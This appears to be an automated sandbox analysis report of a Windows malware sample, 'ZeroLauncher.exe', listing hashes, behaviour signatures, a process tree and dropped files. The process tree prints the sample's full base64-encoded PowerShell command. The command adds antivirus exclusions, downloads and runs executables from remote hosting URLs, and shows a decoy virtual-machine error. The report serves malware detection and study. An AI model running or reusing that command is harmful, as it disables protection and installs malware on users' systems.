Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    04-10-2024 04:59

General

  • Target

    ZeroLauncher.exe

  • Size

    19KB

  • MD5

    982e4ae4559538cfb529dfaff0507880

  • SHA1

    a3b0e3989d6e40792134286e40448004ebeda077

  • SHA256

    95a08f9fd8741d2b265a43143289af012ca24cee776609bc79337d63988246fd

  • SHA512

    35d23d332c0389b3d3e7086613e60d73c158a7dd408bc4320ccb10aba8c2755ea99bf0d484cd257d53d42a6fe95a9bab0c606e7c580039aa5334767a4096662f

  • SSDEEP

    384:/LVHmcPXblyCKGK9dnORWsK7PPZzcuIYZKJHtZW39cDpbJO:/hHHPbICKJEW7PPeQKy6db

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 6 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ZeroLauncher.exe
    "C:\Users\Admin\AppData\Local\Temp\ZeroLauncher.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2148
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcgB4ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG4AdQBzACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAVgBpAHIAdAB1AGEAbAAgAE0AYQBjAGgAaQBuAGUALwBTAGUAcgB2AGUAcgAgAGkAcwAgAGEAbABsAG8AdwBlAGQAIQAgAFQAcgB5ACAAcgB1AG4AbgBpAG4AZwAgAG8AbgAgAGEAIABkAGkAZgBmAGUAcgBlAG4AdAAgAGQAZQB2AGkAYwBlACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAawBrACMAPgA7ACIAOwA8ACMAZQBmAHIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAHAAZwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBuAHoAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBhAHEAZAAjAD4AOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvADUAOQA0ADAAagBnADkAOAAzADQALwBnAGYAMwA0ADQAMwBmADMALwByAGEAdwAvADAAYQBkAGYAYQBlAGYANABmADgANAA3AGEAMQA3AGUAYQA0AGUANABmADYANQA2AGQAYwBkADgANQBlADcANgAyADkAMwA3ADgAMABlAGQALwBEAC4AZQB4AGUAJwAsACAAPAAjAHAAagB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdgBjAHkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAeQBjAHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAZQBuAHMAZQBHAGUAdAAuAGUAeABlACcAKQApADwAIwBiAGcAawAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAGkAdABiAHUAYwBrAGUAdAAuAG8AcgBnAC8AcgBlAGMAaABlAGEAdABzAG8AcgBnAC8AcgBlAGMAaABlAGEAdABzAGQAaQByAGUAYwB0AC8AcgBhAHcALwAwADAAZQBiADIAZAAwAGIANAAzADYANQA5ADEAZgBjAGUAMQAxADUAMwBiAGEAYwBhADcANgAyADUAMAA5AGUANwA2ADIAZgAyAGMAZQA0AC8AQwBMAFAALgBlAHgAZQAnACwAIAA8ACMAcwBiAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBoAHEAdQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBrAHcAcwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBDAGgAZQBjAGsALgBlAHgAZQAnACkAKQA8ACMAawBpAHgAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAHIAZQBjAGgAZQBhAHQAcwBvAHIAZwAvAHIAZQBjAGgAZQBhAHQAcwBkAGkAcgBlAGMAdAAvAHIAYQB3AC8AMAAwAGUAYgAyAGQAMABiADQAMwA2ADUAOQAxAGYAYwBlADEAMQA1ADMAYgBhAGMAYQA3ADYAMgA1ADAAOQBlADcANgAyAGYAMgBjAGUANAAvAEQAZQB2AG0AaQBuAC4AZQB4AGUAJwAsACAAPAAjAGQAdQBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaABoAHQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdQBzAHIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAUwBlAG4AZAAuAGUAeABlACcAKQApADwAIwBoAHcAbgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAG0AagAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZwB1AGoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAZQBuAHMAZQBHAGUAdAAuAGUAeABlACcAKQA8ACMAdABhAGIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAaQB1AG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHYAaQBlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAEMAaABlAGMAawAuAGUAeABlACcAKQA8ACMAbgBqAHcAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAaQB4AGkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAbQBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAFMAZQBuAGQALgBlAHgAZQAnACkAPAAjAGQAbgBnACMAPgA="
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2952
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#nus#>[System.Windows.Forms.MessageBox]::Show('No Virtual Machine/Server is allowed! Try running on a different device!','','OK','Error')<#wkk#>;
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2732

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    7876e809f4d4c95db016453e8203961e

    SHA1

    9aece38bb8cd218f6b105738a003b84bfa4a45d9

    SHA256

    48c648dd3f7ae466a71a821488b247372e8da09548a556a91cc6b4370f2ca9f9

    SHA512

    4d961db9fabfa81f898a17f947385467b748e9544a54a5081305d34d0d6903121197296f0e8e5080a8df1e323f2e4b169c30170b3fe8202e8282474eb6bb83a7

  • memory/2148-0-0x000007FEF5F93000-0x000007FEF5F94000-memory.dmp

    Filesize

    4KB

  • memory/2148-1-0x0000000001130000-0x000000000113C000-memory.dmp

    Filesize

    48KB

  • memory/2952-6-0x0000000002D80000-0x0000000002E00000-memory.dmp

    Filesize

    512KB

  • memory/2952-7-0x000000001B7C0000-0x000000001BAA2000-memory.dmp

    Filesize

    2.9MB

  • memory/2952-8-0x0000000001D90000-0x0000000001D98000-memory.dmp

    Filesize

    32KB

  • memory/2952-14-0x0000000002D80000-0x0000000002E00000-memory.dmp

    Filesize

    512KB